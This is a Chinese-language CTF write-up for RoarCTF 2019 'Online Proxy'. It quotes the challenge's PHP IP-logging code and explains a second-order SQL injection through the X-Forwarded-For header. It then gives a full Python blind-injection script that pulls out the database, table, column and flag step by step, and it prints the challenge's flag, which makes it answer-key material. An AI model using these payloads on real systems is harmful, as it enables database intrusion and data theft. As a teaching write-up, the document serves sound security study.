[RoarCTF 2019]Online Proxy
[RoarCTF 2019]Online Proxy
考点
盲注
二次注入
wp
直接输入参数 ?url=https://baidu.com/ 在请求包发现注释的 Current Ip
在HTTP header加上X-Forwarded-For: 127.0.1.23发现这个IP写入了 Current Ip
<?php
$last_ip = "";
$result = query("select current_ip, last_ip from ip_log where uu");
if(count($result) > 0) {
if($ip !== $result[0]['current_ip']) {
$last_ip = $result[0]['current_ip'];
query("delete from ip_log where uu");
} else {
$last_ip = $result[0]['last_ip'];
}
}
query("insert into ip_log values ('".addslashes($uuid)."', '".addslashes($ip)."', '$last_ip');");
die("\n<!-- Debug Info: \n Duration: $time s \n Current Ip: $ip ".($last_ip !== "" ? "\nLast Ip: ".$last_ip : "")." -->");这里是一个二次注入,下面给出详细分析
根据已知信息,不难判断数据库中存在三个字段,分别是 current_ip,last_ip和uuid 在初始情况下,last_ip是空的
此时修改HTTP请求头为X-Forwarded-For: testtest,由于新输入的IP和数据库中保存的当前IP不同,所以会删除已存储的,然后经过addslashes()函数转义新的IP,再将新的IP和last_ip插入 如果相同,就会将数据库中存储的last_ip赋值给变量,然后再转义进行插入。根据代码此时的ip应为testtest,last_ip为174.0.0.2 插入语句顺序如下
insert into table values ('x', '174.0.0.2', '');
insert into table values ('x', 'testtest', '174.0.0.2');
假设输入为 X-Forwarded-For: 1' or '1,因为和已存储的current_ip不同,所以会删除以前的内容,然后经过addslashes()函数转义,再存入数据库,存入数据库的内容为 1' or '1 ,根据代码此时的ip应为1' or '1,last_ip为testtest
insert into table values ('x', '1\' or \'1', 'testtest');
然后输入X-Forwarded-For: 123456,因为和已存储的current_ip不同,会把last_ip赋值为1' or '1 然后删除,再插入。如下语句,很明显构成了注入,'1' or '1' 的结果为 1,所以最后结果为 1,但是这是插入之后last_ip的值,根据代码,此时的ip应为123456,last_ip为1' or '1
insert into table values ('x', '123456', '1' or '1');
再输入X-Forwarded-For: 123456时,才会看到经过SQL运算之后的值
脚本如下
import requests
url = 'http://node3.buuoj.cn:29612/?url=http://127.0.0.1/'
# ctf
def get_database():
flag = ''
for i in range(1, 50):
low = 32
high = 126
mid = (low+high)//2
print(flag)
while low < high:
payload = f"0' or (ascii(substr((select database()),{i},1))>{mid}) or '0"
header = {
'Cookie': 'track_uuid=2a04ebb6-db29-4542-8183-4adb4e1fd008',
'X-Forwarded-For': payload
}
requests.get(url=url, headers=header)
header = {
'Cookie': 'track_uuid=2a04ebb6-db29-4542-8183-4adb4e1fd008',
'X-Forwarded-For': '123456'
}
requests.get(url=url, headers=header)
header = {
'Cookie': 'track_uuid=2a04ebb6-db29-4542-8183-4adb4e1fd008',
'X-Forwarded-For': '123456'
}
r = requests.get(url=url, headers=header)
if 'Last Ip: 1' in r.text:
low = mid + 1
else:
high = mid
mid = (low+high)//2
if low == high:
flag = flag + chr(low)
break
# information_schema,ctf,F4l9_D4t4B45e
def get_all_database():
flag = ''
for i in range(1, 50):
low = 32
high = 126
mid = (low+high)//2
print(flag)
while low < high:
payload = f"0' or (ascii(substr(reverse((select group_concat(schema_name) from information_schema.schemata)),{i},1))>{mid}) or '0"
header = {
'Cookie': 'track_uuid=2a04ebb6-db29-4542-8183-4adb4e1fd008',
'X-Forwarded-For': payload
}
requests.get(url=url, headers=header)
header = {
'Cookie': 'track_uuid=2a04ebb6-db29-4542-8183-4adb4e1fd008',
'X-Forwarded-For': '123456'
}
requests.get(url=url, headers=header)
header = {
'Cookie': 'track_uuid=2a04ebb6-db29-4542-8183-4adb4e1fd008',
'X-Forwarded-For': '123456'
}
r = requests.get(url=url, headers=header)
if 'Last Ip: 1' in r.text:
low = mid + 1
else:
high = mid
mid = (low+high)//2
if low == high:
flag = flag + chr(low)
break
# F4l9_t4b1e
def get_table():
flag = ''
for i in range(1, 50):
low = 32
high = 126
mid = (low+high)//2
print(flag)
while low < high:
payload = f"0' or (ascii(substr(((select group_concat(table_name) from information_schema.tables where table_schema='F4l9_D4t4B45e')),{i},1))>{mid}) or '0"
header = {
'Cookie': 'track_uuid=2a04ebb6-db29-4542-8183-4adb4e1fd008',
'X-Forwarded-For': payload
}
requests.get(url=url, headers=header)
header = {
'Cookie': 'track_uuid=2a04ebb6-db29-4542-8183-4adb4e1fd008',
'X-Forwarded-For': '123456'
}
requests.get(url=url, headers=header)
header = {
'Cookie': 'track_uuid=2a04ebb6-db29-4542-8183-4adb4e1fd008',
'X-Forwarded-For': '123456'
}
r = requests.get(url=url, headers=header)
if 'Last Ip: 1' in r.text:
low = mid + 1
else:
high = mid
mid = (low+high)//2
if low == high:
flag = flag + chr(low)
break
# F4l9_C01uMn
def get_column():
flag = ''
for i in range(1, 50):
low = 32
high = 126
mid = (low+high)//2
print(flag)
while low < high:
payload = f"0' or (ascii(substr(((select group_concat(column_name) from information_schema.columns where table_name='F4l9_t4b1e')),{i},1))>{mid}) or '0"
header = {
'Cookie': 'track_uuid=2a04ebb6-db29-4542-8183-4adb4e1fd008',
'X-Forwarded-For': payload
}
requests.get(url=url, headers=header)
header = {
'Cookie': 'track_uuid=2a04ebb6-db29-4542-8183-4adb4e1fd008',
'X-Forwarded-For': '123456'
}
requests.get(url=url, headers=header)
header = {
'Cookie': 'track_uuid=2a04ebb6-db29-4542-8183-4adb4e1fd008',
'X-Forwarded-For': '123456'
}
r = requests.get(url=url, headers=header)
if 'Last Ip: 1' in r.text:
low = mid + 1
else:
high = mid
mid = (low+high)//2
if low == high:
flag = flag + chr(low)
break
# flag{0238f77f-f8af-457d-bc43-0224d4d98428}
def get_flag():
flag = ''
for i in range(1, 100):
low = 32
high = 126
mid = (low+high)//2
print(flag)
while low < high:
# flag在另外一个数据库
payload = f"0' or (ascii(substr(reverse((select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e)),{i},1))>{mid}) or '0"
header = {
'Cookie': 'track_uuid=2a04ebb6-db29-4542-8183-4adb4e1fd008',
'X-Forwarded-For': payload
}
requests.get(url=url, headers=header)
header = {
'Cookie': 'track_uuid=2a04ebb6-db29-4542-8183-4adb4e1fd008',
'X-Forwarded-For': '123456'
}
requests.get(url=url, headers=header)
header = {
'Cookie': 'track_uuid=2a04ebb6-db29-4542-8183-4adb4e1fd008',
'X-Forwarded-For': '123456'
}
r = requests.get(url=url, headers=header)
if 'Last Ip: 1' in r.text:
low = mid + 1
else:
high = mid
mid = (low+high)//2
if low == high:
flag = flag + chr(low)
break
get_flag()最后更新于